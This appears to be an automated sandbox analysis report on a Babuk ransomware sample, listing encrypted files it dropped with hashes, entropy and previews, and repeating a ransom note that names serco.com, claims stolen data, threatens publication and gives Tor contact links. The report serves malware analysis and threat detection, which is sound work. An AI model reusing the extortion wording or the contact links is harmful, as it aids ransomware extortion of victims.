                                                                            SHA-512:4B70AD5B5781F6F52B81E4B67AC8A02DF7DE63D0B54513FBBF4F57497B2BA165950660F1A6E9EABD293CE2F1B13E56F59B3CE273675BAC810BBD0654EF7B8552
                                                                            Malicious:true
                                                                            Preview: ..&.=..+.!Z5..i.3...B[.3.QzYi.+u.<.....2....t...U .h.W....Bo....4sh.&...,yS.{...I...g%.].).,.\oXf.....HR...d..2..!.R#h.k@.\M..W2...b....g...%w-......H..E..1...@....n*j..b.V..P...$.8 K...-.l.,]y..]!g1....p.L.....3.VN..#..6o.+K.{.|........Z.(..ok.R.seC..gL0..vE.s..k.....Fmi$.v.S*..k]2{................S.#...l..D~tQ...A.q.^.{..A..J..M5.L.........L.dHda.f.........NT.:.#N'......^..=...G.h../.S.@X......?.0..F.......nW.q.o9.Q\~3z..~..S.E...:....4.....FX...$.5..;Gy..d...X-...........K...$W.......Q.........:.i{..l..8....rH.w...M..{q=.+.Y.$.&.b.:.%...5?.....xrT...x[.._b.V.G...h...f.l=.H..n..t.Hm....N.0)....YT..0....n..p.....%\H..1...x..s.r'.....+hL/..<....U..E._.WhP..D).....=."ET.7..=S.....W*..:..L.z.zK..&LQ.gv._I.....CzS.a.....3......#....b.`.4.m..H>~.'..0..0#.,......J.mi..|*.W~..f...%jhb.-..$I....sQ*^...JtS..rwJ....'.B.u'.....P..AH...x`.....0..y.V.....R....xr...1.|u8....BY...7aK.......+F......o.".5.\d......a\R...v.e.l..G...x..vF...\..
                                                                            C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999628272843094
                                                                            Encrypted:true
                                                                            SSDEEP:12288:us3N8bEyS7SkOYefgsUee1HdtfwLX/Fjq3t5Y+xzLfTWMS:/R7FOBgsRe1HfQX/FmtnxPfTo
                                                                            MD5:64C46DACA4D696DFA733390B4A8F1628
                                                                            SHA1:D10073B9A5656C1551ED406142C3B0A78838F366
                                                                            SHA-256:A8CE844EA05F86B8BC0DB1E2D0C348CCC4DF6D47D17FF264D76A95CE3AF7E107
                                                                            SHA-512:7553B0E58B5ED9BF1FD0E675E130FF1EF9A3A9F29897A03D9AC67811641FE9BE8368371D84C7505429E4B651E2CB191BBA4F8A844441E583B06279B1FD5D9F5E
                                                                            Malicious:true
                                                                            Preview: W.i....&a......T)..&..U./.P.J.."...p.\IG.=..@W....c[\...{s...cW..M..~{..Yr.ow5$..!r.....g.l|@CK].`...9nF...L.Dl........#.....p....,.....I.H$.*.K2.b....[u.....a1..%,...>.G......M<0`ag.m#....m)..t..c.iL.....xn.;..5 b..(,..P...I...M.h.0..v..YZ....C\3.O.m.3.RI}..)... ...........P.....e...ac..q}.ip......M\..q.....T.y0.!B.g....v.....cf..>wtV.....B.......A....QVWl...a6...{L..a.w..b......8U..fS.:.2t.)+..7......[.an....u.?....,.a....P.e.M....}O..(...o6.....g.9...M.q<.#....D..&._....$.....D.k..A6;....n..X.......c...f......*i...."...H.....A...S.#.~}....2.4.^..q72. ..S...n.......Q0o.k...*<.....A.n.6;..6.$..._.lb........'..........F...9.{.L.$..Q..H..!UZ~..,Cga......3..m..2..[..~P......]..2l...k ..j..(S.c....q..<.|.0(.'.\Q}.........T.Z*4...'...7)o)..v.....>X..w..#u..N..0...!..z.H4Q........h.M|$..D.>.%...]6.?.s..9I.(..F.=.oM...mf%...D.M.n..^1!.P.......^J..).."CS.Rtda...5.9.....r..~D.O..@...0.e6\\X<.,aN7...&*...%...;......i.C.}.......v....t...oD..
                                                                            C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999673841425525
                                                                            Encrypted:true
                                                                            SSDEEP:12288:XX6L0H/+BDqX0R6s7CVaY/RLicLKG3+Pmp2I4HHAHF:j+BDqERR7Ck+dz3+PmvYqF
                                                                            MD5:2DEDD4D3293F511210FA655C83F71202
                                                                            SHA1:B4F6464587181C9535E58124AF5B526BD92DF6A3
                                                                            SHA-256:27264078A1B41C7905D810175497A1FD90C77A43987D23E7016AE7BE22A51BD6
                                                                            SHA-512:5B7F5CD6C41152DB0A1D8F57B3DB4CCDFD62D5C618FC0F7ADD1C84590EA5B2290A915006BCC51D3FCE9921AB2605649F98D197BCAD0AE1F832467613624D96E1
                                                                            Malicious:true
                                                                            Preview: ...1.A(....NZ&<X.(0p.....m..y)u.L..F.]..U ...]VA...3R."L2.....'..#r\..@.F.c..%.......X.q..C6P.,...|..m..f.......U...VT..>...|i6h:....?OA..Q.....If....]./s...s..5GB..E.i....,'...>...tJ....O.....h...0.q.6...Ez....V,....i....AZ.w..1&.._\...H#{..{.Z....../.......a...A..0......+z.o.t_.S.h3!GS.B.A........n...X.|X"). ............2...M.>..>.$....Q..}.Q...m...+..y.......x... B0....N..cm..M<'...E."..<-.l.s-.p..>.{.".yH.@.^...,z31kt2.......QH..?...+.L....q.=-.$...QaO.....bJ...R.6..P.^L.;.U.:..9.u.wk.oTie......J;....C.....{ e..<?..hv%..2..j.N.../0..jz.+.d.a.s.l...cpC;..Z).}.3..Im.-&.yZ..0j.[...T.W......h.K...U.1...j./.f?9[.L=.hR........K.YW)..C=}......d=.eF..`....$.;v}...j0...a...(.....b!a..a[.!.Pw......{s..i.fm).. 5.Aki.._..5..?.{..y.d.F....$..._...w.............!..K2e.o..v..(;_.....S..e....=^.j...V...d.M...D.>....4.......d......{....HD.......|..!z....3N0..l.6....9..i.3.Z)..KPq...U7...w..n~i.f(.n.#...........d...ZNeW......-Sb.ei
                                                                            C:\Users\Default\Pictures\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Saved Games\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Videos\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\3D Objects\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1203
                                                                            Entropy (8bit):7.84607657210294
                                                                            Encrypted:false
                                                                            SSDEEP:24:fYbXZChMpjgnuu6oexQHX9x5RxnYh4YRSGPND4SKvuKEu:KXZChUMnKoeijxnM4YRTPN7Y
                                                                            MD5:2421A4CB843C40E3A1A01BE2F7672E05
                                                                            SHA1:9F35BE6728812CD9DF659A6C2B7818202FC6777B
                                                                            SHA-256:78330F3F019294739383C690C8F1DBBFF1E512E6B3C2CB12C1BA39C1E6D445AF
                                                                            SHA-512:7CD19CBCDCB9000DE9694E008FE7A155D1FFA9E25D1F9F3CD60A8445ACFE9D22C6B1BA73C3C0C3DB379F0557B33F88A0E45494EAFC889853CCE548935496E1E5
                                                                            Malicious:false
                                                                            Preview: ....... ...hJ.!...F..C..G...e.p!.. ...yw."..@.Ak..$..._.@..|.J.(.1.i.&.y.k^Nt4E.[$.9..O.sD.@$.........E.T.@.J.w...c.sr.).13..g......#J...........4.Frk..._t..}.(X1....<.Zy..s3.nm.|8..a.g.+.$..W~..s..Y...........|..QkO..SP.%C}u...7.H..M..}6Mesl..O.+...#. ;>...C.....{.....58....K...Q...QU.H..~lL..1Z...c.6.n..p....M.f....C......dt..z..] 9..=.........6..fz.!.<..].5}..z..].+.7p.Z..D..F@w.......>...E...X..Z...4......r\Beo....0.....GYm..#........^.'.Oz;.)..d>.0d...n*}._...@.k.V..2...{u|..^..F6d`..=.....h../;..N.1...2...........#..\..IE..Vg..wb........6..=.o6.R"...xtO.`.k.w2dJ.....&..G.\.<7O..r.YoLy1...[j.XS.=%&B.......t7.b...e..j.n....Jj..Z..?..S_D..;..../.uO.%k..Q...n....:z..b....r#`.....X$6....... .x..4.T..A.N.m...'..I-N.n.. ..L....evC,1'.t...x.B....U..'.v....>.Ec1.X.9EJR.l..qM...y.%JZt....M.I....qm(*D..N.."...RW....t...[M..8z.,.#.*.<.;.$..d.c.>.Tu.k.._..T.Y.z..[..j.e.1I..T9.~.LK+.z.y....Y.....Lj..I.......e.7..k..Y..{.H7*![..-.......".C0kz...
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):80556
                                                                            Entropy (8bit):7.997364599399268
                                                                            Encrypted:true
                                                                            SSDEEP:1536:zGnKxm9LViWawICgCyWxOJ3+7o0MMW8ghyHnH7hQiDyAh/Sc2fNK6S1D9NP3+P1F:zGnKM9dI4YottcyHnbhQiD/h2fNK9pN0
                                                                            MD5:81013757FF32B78A341BB48968DE4EF5
                                                                            SHA1:38DE45B824BA7A2317BEF94C5709BF69D3538754
                                                                            SHA-256:09AC1E00608083475D9DB730E0D924C6E6538CFDBB57C73A913F089E5406D9D2
                                                                            SHA-512:7C1B050E04071A980C0E1A71A1D95795AB044ED752E837ACF291B123CD8681A3644B9055CA76EEC2AA7059DEB9BAA6B5CB2313A6B7E7CFF8E57B7C6BA0E0180B
                                                                            Malicious:true
                                                                            Preview: .c.?....*N.........~[..Fu.<.$}.J7.T#.9.{.....)..q.......`v4......Q..........x.....d....0.....&.U=.x....gX......t......-.m......I...Z......>R.f..T.3x_..i..H......l|U....lP...+......?..m_...| ..!.?n5.......S._.-...zf....04L......v..Q..h....q."..+...n.E..`..;..k....k......].H.t..^<.....]...[<..;...........w...v.....w...t.Sn~.....A.s....>.(...L......nf#..'...?d+..}...w...xI.RI.Lb...... N.9.=..1...mIlI....$n...Q.I{.5.swMK...*.!|.".....l.F.UD. Oe.-........\.:B..Z]v....$T.Q-.._.y.ck..k..F[E]...s.. ...6..-.2UU.."/..._lB......q...r .`0..oB.<...b.S...&........v.6.....O..(....'.&/..TM7..L<z.....4.:..x....L.;.8us.a. ...c..C...._...4..^.....$q&..G..I.f.]4.W.?..v^......&]...._....X...G...._..G.........!..I.7x,........~u...Ay...tF......Cl...I.F...e.Y...t.^..........C4..w'.2ky.y6....p...d/...C1.LJnuLE.L.;.%...U.\....:..<|&U..X6.^.............p....I.$..}.....C.@..@....>.......z.#Ok4t ..]M.S!.....r..a..."uF...97..oPz.I..J6..........&.ga.0
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):9734
                                                                            Entropy (8bit):7.982017278728285
                                                                            Encrypted:false
                                                                            SSDEEP:192:fnxYzlhvacJqErKF8dRLw62zGPfRb+nxLDEW4dTpyggqcuPX2WQTe:v0jr1zLHPf5i5ED1NbPge
                                                                            MD5:275D3448C381F06604B97ED78FA86A62
                                                                            SHA1:BFBDDC80DF4E52E4FE3A07022FE34222BDCAE18D
                                                                            SHA-256:CFDCD396CFDDDD209696E10667FE2EDAF705D0FD45CEEB33115310054D9D6AC8
                                                                            SHA-512:7B3176B014209AA51C8A026057BCE684AE03E3B7F9E8713D02CD8DC2149C977D20C3F0A12C03748B801360C5A1D7179D017E6D8A294969F4FF6AE066534C55A1
                                                                            Malicious:false
                                                                            Preview: .....R..'~..a4.n.Fa.O|.,D7T.%.... ..`'.`.............1...-.(../8.y.G.8 8 .}..6........../.1|t~r.q}..h....y.Mn.Q.=.h"..Pge...8....c.+..(l..7.Kc..6.Q.Yji..NM.,Nm.e.,3.4>\...C...R.L].. .....H..B..x%.4..B).".bA..e~.D%}..`...~..R."...<]....i..j...I....n.P...p. ....u.XM....s..UsvA...*...i..@a[$..z.H.@..(+0A.>.... Z.:.A....5.[..|V....XYP......M9ibx<.j'.$&.........m#%.@.D..ep.."e..y.hR[b.."...Lj'}:.v-.i......Njju.Y.D5...Z.Y..e......6~..c....`s..V ..[.z.s...."o_.`H(J8.!..f...l..................0..M.BZF..[.dg..H.M&.5.@.....9..*.x=.....J.....@'|..?Eu.X..va..>y...k.e.6...qQ.j...."..kaa.,.......d)..,.<.oz..CN.l....npb.d(.?... .C.p..K.C..1.a#./.U.!..%.,...qa..1..9..r.l.gMXf4S'..v/_r4...#W...i..E.<....5........O..5....s.0.....l.W5.1.U.;..4.,#|J..M...!f._.....x.J..xK.~h.B...`.IuDQ........=..d....4.Q....w.......yYy.:..;.".d..S.n.g.....W...U}0.WHO..3......~.b....y!....s..u.).l0.;x.....g+.....Z..O.".:.Z....P.M....z.......-/e.|0....4.N.........r
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):235723
                                                                            Entropy (8bit):7.999251673329134
                                                                            Encrypted:true
                                                                            SSDEEP:6144:JRwGNYhWrTaiC84GUZm/7f8MeavCqCLDBYEqkWNGk:JRVNYhQNDXeVdDHuGk
                                                                            MD5:69E8E54DCF966D93FDDE5ADDA63F559E
                                                                            SHA1:727F169F5CFF273FE5BCD7E14222A1084E12BAE2
                                                                            SHA-256:C4967CC147E06AC4106EF02B00F39F8BD3AABCD90FA6DC09914EEB04C7A055B5
                                                                            SHA-512:5CFFD0BEEA0C27902A681DDFF6E3DA95A74B7A75A72C2E0DBBA9C304822A5C82C6C0EA5CD517A94BC4E799D6EBC6B2AAE0361DA3C316F1C0FBE129DEE4F0805D
                                                                            Malicious:true
                                                                            Preview: .&...[/$.aWG.6l3H})..bk.4&.d...{+..".m......yvG.N.i.).)~.......?Z...Uq+..._.k'<:;.E....W.r..>..m.T...<./:...{.3?.$XCV"...:x.#(...F.kN.2.Xr...`....i...(w...[....&...._~v...?..&(...`n...g...0..{.*O.yr..(8...:%k<..3\o.,G|.W........7KC.|....j....s .......n...%.wqr0........<.N...P..S...X.a .d...z...>.q.<S...J.7.....&.......F......Z....R.a....d...Ab.(.~.Y.O{(xb......H....e.Q..+....X...V..............W.D.+._.$......w...s'.u.6..@..Q.o.y.-..}u.;0%.l.u'.w._7.....%BRe...o.pX.....`...`s..q...0. 7.........3.../..k..}.j.?jK&yrU{8.....?..Y.U.^......T.].'?.;........q.....U..zGhL..A!.0n. .WL[ \.9.ve`..F..C.."....'.+....y..$......b.@!9.....M ~:.I..Xu|o.s..i..(...._.C..[tG....fOS~.E...b..l.H...$.hRk.<.Py..+...^|..}G$B82.....F(.J..j./j.]H.d.2%...HPA:.?..%.Z.P....~`......*..L..$.5..r..#..Y.:...4.d..`Y........T.....m..+X...:.lb......ANZ... :...~..{.o%0.5.?585.TNr......qW.W...<.....A' ......\...W.....S...&T>t.|W..p..\.o..[C.c%.#.#..qKK...L.L{..K/l..l..J.t....
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):12456
                                                                            Entropy (8bit):7.984400639023804
                                                                            Encrypted:false
                                                                            SSDEEP:384:X5ciR6/Yeo5HfLMFbslbXYaIvT8mjfEDQccIJbVHh:X5cF/YttLMxslm79jcckJbz
                                                                            MD5:94EC05B831AA570BDF10FB750B0C8714
                                                                            SHA1:5A030FAEBE421F29E162168DC8318E74D8FB628F
                                                                            SHA-256:F2F57E1324C49A1AF7657373E495D507C659AE078F65A799FF0445BA9F145901
                                                                            SHA-512:BAAB8D22130AEA55DD69E14CE2A7BE35051FDD029019F150CC917B657988B7781A295C6629537B44D554CCB3DBA10E6E5E65BB1B8F7748764169C476CBACC4B3
                                                                            Malicious:false
                                                                            Preview: 6i......n........(V.A.....9.....`....j.'C[.A.....>....L..#p..PH....:.D~.Z.'u.o....a.R..t.....-jH\.n_.<....I.o.<...]8.]5...K..+w..c.....P06...}..<.'{.n..!.4.....U..7.E.pi....5rk..x.3{.W.Y*.b.A..[...j.t........]......-...+b..h.}.&b[aqD.K.|...w16 J.W.....K....1#9H"..A.s...,l@..V..&._........8g.e.R6.w..~eZ.....0.x7.......ROx.._.D..E[.a..$=L.h.....O^.i..E.7.......0%...m.....R.<]a....N4.....o..+X5)`.\.e.f..9.3.d..FL/lCv."...6.aT.dX.Od.W|.4>..A....].....k.`..r1..(.3...o....&J.A...9."~..^..U.[.]. .0V#M3...\.R..A......??g.%.H....S0~.4p..Iq..q.rT.s^M...t....&..z.....:(....&...v.5W..owN....&.........o-.i`.*esE..W..d....2_.......+...*}).v`.2^d|:e?...Y..x]&,....L..ts0E!..e.*@........Z....*..|.....:/.en..tl.P.Y8?...*..%D@..d_..G..#.....P.>..i...s...b.&O.ESfq.... .I....5....*t.&DD...0-.+.)...L.-..B.h.zu.*'i....S1.L..!oZ.7...}.P...+T..S..%..m3....?v......(R.NV.L.s( .....>.........T........f.T.....n5..T]..@f}......,...".{8.7...9LRI.t.kM. h..*.@p........B&
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):32821
                                                                            Entropy (8bit):7.994684125304462
                                                                            Encrypted:true
                                                                            SSDEEP:768:El+lM/BPt8U0UXRji511AmpEhZ5kD6sgW5GMErKazRGskDY0ILHJ:Ed/B2raFO1ASgZ5kOszYPrK2Gsk2HJ
                                                                            MD5:0C302372801CE62D404CAFE750AE3F6A
                                                                            SHA1:6D8EFCF1ECAEC1FB80705AC1D1CA645F28560DE1
                                                                            SHA-256:9199524384CF22247590FF4A77C1B96485EE616A45C067D0A25164CF0EDC71CE
